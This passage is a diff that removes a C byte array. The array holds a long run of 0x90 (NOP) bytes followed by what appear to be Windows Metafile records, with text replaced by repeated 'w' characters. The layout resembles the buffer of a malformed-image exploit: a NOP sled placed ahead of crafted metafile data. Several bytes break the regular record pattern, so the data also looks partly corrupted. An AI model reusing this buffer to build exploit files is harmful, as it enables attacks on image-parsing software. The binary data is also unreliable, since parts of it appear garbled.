-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x00,
-	0x09, 0x00, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
-	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA5, 0x01,
-	0x2A, 0x00, 0x09, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
-	0x0A, 0xFB, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x09, 0x00, 0x07, 0x00, 0x09, 0x00,
-	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x8A,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x70, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0x2A, 0x00,
-	0x0C, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0C, 0x00,
-	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
-	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
-	0x32, 0x0A, 0xBB, 0x01, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
-	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
-	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0xA9, 0x00, 0x14, 0x00, 0x00, 0x00,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x20, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
-	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00,
-	0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
-	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0xBE, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xD1, 0x01, 0x2A, 0x00, 0x24, 0x00, 0x00, 0x00, 0x49, 0x20,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x42, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20,
-	0x42, 0x20, 0x07, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x09, 0x00,
-	0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
-	0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00,
-	0x06, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00,
-	0x0A, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
-	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
-	0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x2A, 0x00, 0x01, 0x00, 0x00, 0x00, 0x49, 0x00, 0x07, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9F,
-	0x0A, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x31, 0x00, 0x01, 0x00,
-	0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0xB0, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
-	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x30, 0x00, 0x00, 0x00, 0x32, 0x0A,
-	0xE8, 0x01, 0x37, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x20, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00,
-	0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
-	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x04, 0x00, 0x0C, 0x00,
-	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
-	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x32, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x24, 0x00,
-	0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0x2A, 0x00, 0x13, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
-	0x07, 0x22, 0x0D, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
-	0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0xE9,
-	0x0A, 0x00, 0x06, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x7E, 0x01, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xE5, 0xFF, 0x00, 0x00,
-	0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69,
-	0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11,
-	0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0xBE, 0x00, 0x09, 0x00,
-	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0D, 0x00, 0x0F, 0x00,
-	0x0E, 0x00, 0x0E, 0x00, 0x09, 0x00, 0x0D, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00,
-	0x00, 0x00, 0xFB, 0x02, 0xED, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
-	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20,
-	0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00,
-	0x08, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
-	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
-	0x32, 0x0A, 0x06, 0x02, 0x2D, 0x01, 0x08, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x20, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00,
-	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
